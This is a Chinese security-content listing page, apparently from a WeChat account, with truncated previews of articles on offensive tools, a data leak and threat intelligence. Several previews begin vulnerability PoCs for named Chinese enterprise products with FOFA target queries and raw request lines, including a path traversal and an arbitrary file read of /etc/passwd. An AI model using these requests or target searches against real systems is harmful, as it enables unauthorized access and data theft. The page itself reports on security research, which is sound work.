起源与挑战在过去 5 年多的时间里,任何从事网络安全和软件开发工作的人,都不可避免地听到过 "安全左移 "这个词。 它与 DevSecOps 等概念的兴起不谋而合,重点都是将安全融入到整个 SDLC ...
紫光档案管理系统 mergeFile SQL注入漏洞 poc
FOFA app="紫光-档案管理系统" POC POST /Archive/ErecordManage/mergeFile HTTP/1.1 Host: Cache-Control: max-age...
Exp-ToolsV1.3.1
微信公众号:[小白安全工具] 分享安全工具与安全漏洞。问题或建议,请公众号留言。该开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。作者不对您使用该工具所产生的任何后果负任何法律责任。 E...
【数据泄露】24年11月5日 美国军方涉嫌数据泄露
声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。近日,据网络上流传的消息,一名自称"natohub"的...
Java Payload 生成框架
微信公众号:[小白安全工具] 分享安全工具与安全漏洞。问题或建议,请公众号留言。该开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。作者不对您使用该工具所产生的任何后果负任何法律责任。We...
Tomcat综合利用工具
微信公众号:[小白安全工具] 分享安全工具与安全漏洞。问题或建议,请公众号留言。该开源工具是由作者按照开源许可证发布的,仅供个人学习和研究使用。作者不对您使用该工具所产生的任何后果负任何法律责任。To...
后渗透 | 信息收集工具
声明该公众号分享的安全工具和项目均来源于网络,仅供学术交流,请勿直接用于任何商业场合和非法用途。如用于其它用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。介绍Pillager是一个适用...
万户协同办公平台ezoffice SignatureEditFrm.jsp SQL注入漏洞复现及POC
FOFA"Ezoffice"漏洞复现POCGET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iWebRevision.jsp/...
如何将威胁情报集成到政企的安全运营中?
本文阅读大约需要12分钟;在网络攻防的持久战中,掌握情报如同拥有“千里眼”和“顺风耳”,能够洞悉攻击者的动机、战术、技术和程序 (TTPs),从而制定更精准、更有效的防御策略。威胁情报 (Threat...
Red Team 利用 EDRSilencer 工具绕过安全工具进行攻击
在恶意攻击事件中,我们观察到一种名为 EDRSilencer 的红队操作工具,它试图识别安全工具并将其警报静音到管理控制台。网络安全公司趋势科技的研究人员表示,攻击者正试图将 EDRSilencer ...
渗透测试 LKWA靶场学习与利用
本套课程在线学习(网盘地址,保存即可免费观看)地址:https://pan.quark.cn/s/5887b7796094该内容转载自网络,仅供学习交流,勿作他用,如有侵权请联系删除。关 注 有 礼各...
HCM-Cloud云端专业人力资源平台 任意文件读取漏洞复现及POC
FOFAicon_hash="-859381597"POCGET /api/model_report/file/download?index=/&ext=/etc/passwd HTTP/1....